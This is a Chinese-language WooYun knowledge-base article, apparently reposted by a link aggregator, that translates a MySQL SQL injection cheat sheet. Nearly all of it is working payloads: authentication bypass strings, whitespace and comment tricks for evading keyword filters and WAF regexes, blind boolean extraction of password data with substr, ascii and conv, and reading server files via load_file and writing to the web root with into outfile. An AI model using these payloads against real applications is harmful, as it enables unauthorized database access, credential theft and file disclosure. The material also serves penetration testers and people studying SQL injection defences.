12
MySQL注入技巧 | WooYun知识库
source link:
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
MySQL注入技巧
原文地址:http://websec.files.wordpress.com/2010/11/sqli2.pdf
0x00、介绍
也可以参考瞌腄龙的mysql注入科普:http://drops.wooyun.org/tips/123
很多东西都是一样的,但是有一些小技巧确实很使用。
以下所有技巧都只在mysql适用,因为它太灵活了
0x01 MYSQl灵活的语法
1 MySQL语法以及认证绕过
注释符:
#,
-- X(X为任意字符)
/*(MySQL-5.1)
;%00
`
'or 1=1;%00
'or 1=1 union select 1,2`'
'or 1=1 #
'/*!50000or*/ 1=1 -- - //版本号为5.1.38时只要小于50138
'/*!or*/ 1=1 -- -
前缀:
任意混合 + - ~ !
'or --+2=- -!!!'2
测试后发现and/or后面可以跟上偶数个!、~可以替代空格,也可以混合使用(混合后规律又不同),and/or前的空格可以省略
'or- -!!!1=1;
运算符:
^, =, !=, %, /, *, &, &&, |, ||, <, >, <<, >>, >=, <=, <>, <=>, XOR,DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN,……
'or 1 rlike '1
空格替换:%20, %09, %0a, %0b, %0c, %0d, %a0
也可以插入括号,前缀,操作符,引号
'or+(1)sounds/**/like"1"--%a0-
字符串格式
' or "a"='a'
' or 'a'=n'a' //unicode
' or 'a'=b'1100001' //binary
' or 'a'=_binary'1100001' //5.5.41下测试无效
' or 'a'=x'61' //16进制
2、MySQL常用的一些小工具
常量:true, false, null, \N, current_timestamp....
变量:@myvar:=1
系统变量:@@version, @@datadir....
常用函数:version(), pi(), pow(), char(), substring()....
3、MySQL类型转换
' or 1=true #true=1, false=0
' or 1 #true
' or version()=5.5 #5.5.41-log
' or round(pi(),1)+true+true+0.4=version() #3.1+1+1+0.4
select * from users where 'a'='b'='c'
select * from users where ('a'='b')='c'
select * from users where (false)='c'
select * from users where (0)='c'
select * from users where (0)=0
select * from users where true
select * from users
以上的语句都是同样的效果
4、认证绕过
绕过语句:'='
select data from users where name="="
select data from users where flase="
select data from users where 0=0
绕过语句:'-'
select data from users where name=''-''
select data from users where name=0-0
select data from users where 0=0
0x02 关键字过滤
空格
过滤代码/\s/
%20, %09, %0a, %0b, %0c, %0d, %a0
关键字OR,AND
过滤代码/\sor\s/i,/\sand\s/i
'||1='1 #or
'='
'&&1='1 #and
关键字union select
过滤代码/union\s+select/i
'and(true)like(false)union(select(pass)from(users))#
'union [all|distinct] select pass from users#
'union%a0select pass from users#
'union/*!select*/pass from users#
/vuln.php?id=1 union/*&sort=*/select pass from users-- -
如果单独过滤union,使用盲注来获取数据
'and(select pass from users limit 1)='secret
通过子查询获取单值来进行比较
关键字limit
过滤代码/limit/i
'and(select pass from users where id=1)='a
'and(select pass from users group by id having id=1)='a
'and length((select pass from users having substr(pass,1,1)='a'))
关键字having
过滤代码/having/i
'and(select substr(group_concat(pass),1,1)from users)='a
关键字select ... from
过滤代码/SELECT\s+[A-Za-z.]+\s+FROM/i/i
select [all|distinct] pass from users
select`table_name`from`information_schema` . `tables`
select pass as alias from users
select pass aliasalias from users
select pass`alias alias`from users
select+pass%a0from(users)
关键字select
过滤代码/select/i
1 有文件读取权限
' and substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+
length('DocumentRoot'),10)='a'='' into outfile '/var/www/dump.txt
2 获取列名
' and 列名 is not null#
' procedure analyse()#
使用substr来做过滤条件
'and substr(pass,1,1)='a
关键字select,and,&
'0#
select data from users where name = ''-0 # int typecast
select data from users where name = 0 # int typecast
select data from users where 0 = 0 # true
'-1#
select data from users where 0 = -1 # false
使用条件判断来进行true、false的选择
ifnull(nullif()), case when, if()
'-if(name='Admin',1,0)#
使用嵌套条件'-if(
if(name='Admin',1,0), // condition
if(substr(pass,1,1)='a',1,0) // if true
,0)# // if false
0x03 函数过滤
构建字符串相关函数
unhex char hex ascii ord substr substring mid pad left right insert
' and substr(data,1,1) = 'a'#
' and substr(data,1,1) = 0x61# 0x6162
' and substr(data,1,1) = unhex(61)# unhex(6162)
' and substr(data,1,1) = char(97)# char(97,98)
' and hex(substr(data,1,1)) = 61#
' and ascii(substr(data,1,1)) = 97#
' and ord(substr(data,1,1)) = 97#
使用conv来进行进制的转换
' and substr(data,1,1) = lower(conv(10,10,36))# 'a'
' and substr(data,1,1) = lower(conv(11,10,36))# 'b'
' and substr(data,1,1) = lower(conv(36,10,36))# 'z'
使用函数来猜解数据
' and substr(data,1,1) = 'a'#
' and substring(data,1,1) = 'a'#
' and mid(data,1,1) = 'a'#
不适用逗号来获取
' and substr(data from 1 for 1) = 'a'#
同样也可以使用一下比较少见的函数来尝试绕过
lpad(data,1,space(1)) // lpad('hi',4,'?') = '??hi'
rpad(data,1,space(1)) // rpad('hi',4,'?') = 'hi??'
left(data,1)
reverse(right(reverse(data),1))
insert(insert(version(),1,0,space(0)),2,222,space(0))
有些函数有类似搜索匹配的功能
'-if(locate('f',data),1,0)#
'-if(locate('fo',data),1,0)#
'-if(locate('foo',data),1,0)#
instr(), position()
使用函数进行字符串的切割
length(trim(leading 'a' FROM data)) # length will be shorter
length(replace(data, 'a', '')) # length will be shorter
2种方式都是相同效果
0x04 注入时主要使用的一些东西
1个控制流程操作(select, case, if(), ...)
1个比较操作(=, like, mod(), ...)
1个字符串的猜解(mid(), left(), rpad(), …)
1个字符串生成(0x61, hex(), conv())
使用conv([10-36],10,36)可以实现所有字符的表示
false !pi() 0 ceil(pi()*pi()) 10 A ceil((pi()+pi())*pi()) 20 K
true !!pi() 1 ceil(pi()*pi())+true 11 B ceil(ceil(pi())*version()) 21 L
true+true 2 ceil(pi()+pi()+version()) 12 C ceil(pi()*ceil(pi()+pi())) 22 M
floor(pi()) 3 floor(pi()*pi()+pi()) 13 D ceil((pi()+ceil(pi()))*pi()) 23 N
ceil(pi()) 4 ceil(pi()*pi()+pi()) 14 E ceil(pi())*ceil(version()) 24 O
floor(version()) 5 ceil(pi()*pi()+version()) 15 F floor(pi()*(version()+pi())) 25 P
ceil(version()) 6 floor(pi()*version()) 16 G floor(version()*version()) 26 Q
ceil(pi()+pi()) 7 ceil(pi()*version()) 17 H ceil(version()*version()) 27 R
floor(version()+pi()) 8 ceil(pi()*version())+true 18 I ceil(pi()*pi()*pi()-pi()) 28 S
floor(pi()*pi()) 9 floor((pi()+pi())*pi()) 19 J floor(pi()*pi()*floor(pi())) 29 T
更多详细的东西可以参考原文去了解,还有一些其他的注入资料可以参考
http://www.ptsecurity.com/download/PT-devteev-CC-WAF-ENG.pdf
https://media.blackhat.com/bh-us-12/Briefings/Ristic/BH_US_12_Ristic_Protocol_Level_Slides.pdf
http://www.blackhatlibrary.net/SQL_injection
http://websec.ca/kb/sql_injection
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK